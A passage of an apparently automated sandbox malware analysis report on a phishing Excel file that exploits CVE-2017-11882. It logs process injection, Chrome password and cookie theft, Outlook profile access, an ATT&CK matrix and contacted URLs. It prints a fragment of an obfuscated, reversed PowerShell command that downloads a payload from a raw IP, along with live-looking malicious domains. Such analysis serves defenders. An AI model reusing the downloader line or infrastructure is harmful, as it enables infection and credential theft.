('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: wfbjvizcWo.exe, 0000000C.00000002.620937131.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000C.00000000.450633569.00000000008C0000.00000002.00000001.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000000.479960904.0000000000850000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeQueries volume information: C:\Users\user\AppData\Local\Temp\gxjh-p60.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\find.exeCode function: 13_2_61E89A10 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,13_2_61E89A10
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000B.00000002.466471419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.521653656.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620757047.00000000000F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620790814.00000000002C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.620825188.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.466373539.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.620984500.00000000026B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.469509226.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E291A3 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,13_2_61E291A3
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E290BC sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,13_2_61E290BC
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E2904F sqlite3_bind_zeroblob,sqlite3_mutex_leave,13_2_61E2904F
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E035CD sqlite3_bind_parameter_count,13_2_61E035CD
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E035DF sqlite3_bind_parameter_name,13_2_61E035DF
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E135A4 sqlite3_bind_parameter_index,13_2_61E135A4
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E16B17 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,13_2_61E16B17
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28DC5 sqlite3_bind_blob64,13_2_61E28DC5
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28D9E sqlite3_mutex_leave,sqlite3_bind_blob,13_2_61E28D9E
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E16CE7 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,13_2_61E16CE7
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28FD2 sqlite3_bind_pointer,sqlite3_mutex_leave,13_2_61E28FD2
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28FA1 sqlite3_bind_null,sqlite3_mutex_leave,13_2_61E28FA1
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28F7B sqlite3_bind_int,sqlite3_bind_int64,13_2_61E28F7B
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28F2C sqlite3_bind_int64,sqlite3_mutex_leave,13_2_61E28F2C
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28EC7 sqlite3_bind_double,sqlite3_mutex_leave,13_2_61E28EC7
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28EA0 sqlite3_bind_text16,13_2_61E28EA0
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28E33 sqlite3_bind_text64,13_2_61E28E33
            Source: C:\Windows\SysWOW64\find.exe, Code function: 13_2_61E28E0C sqlite3_bind_text,13_2_61E28E0C
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 121 Scripting | Valid Accounts | 43 Exploitation for Client Execution | 121 Scripting | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 111 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | 1 Browser Extensions | 412 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 Security Software Discovery | Distributed Component Object Model | 1 Email Collection | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 412 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            [Behavior graph. Behavior Graph ID: 1493701; Sample: Mac Purchase Order PO102935.xls; Startdate: 16/08/2024; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label
            Mac Purchase Order PO102935.xls | 9% | Virustotal |
            Mac Purchase Order PO102935.xls | 100% | Joe Sandbox ML |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc | 100% | Avira | HEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc | 100% | Avira | HEUR/Rtf.Malformed
            C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs |
            No Antivirus matches
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.2886080.xyz/Friends/546f06199392.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/1198420.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/js/common.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=find.exe, 0000000D.00000003.509961579.0000000005E69000.00000004.00000020.00020000.00000000.sdmp, 2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/dongyuefeng/8/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.kcrkimya.xyzwfbjvizcWo.exe, 0000000E.00000002.620971996.0000000001E6C000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/477d06199461.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/favicon.ico2893AGJN.13.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/julisha/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/254f06199684.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/xiaoxiyou/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/3038130.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/451c06199487.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/5835120.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/04f06199934.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/365f06199573.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/dongyuefeng/10/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/images/qr1.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/70b099929.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/baishimolinai/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/4025030.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/dongyuefeng/9/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/7726870.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/246f699747.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/3087620.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/343b06199595.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/516e06199422.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/850c06199088.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/996a06198942.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.2886080.xyz/dongyuefeng/1/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/6496300.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/5580300.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.instagram.com/hover_domainsfind.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/8904020.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ia803104.us.archive.orgpowershell.exe, 0000000A.00000002.444696114.000000000275A000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net03powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.2886080.xyz/Friends/284f06199654.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/544c06199394.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/338e699655.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/603a06199335.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.2886080.xyz/dongyuefeng/6/find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/402d06199536.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/sitemap.xmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/975b06198963.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/uploads/images/9803940.jpgfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/images/symbol-7.pngfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/247d06199691.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/660b899331.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
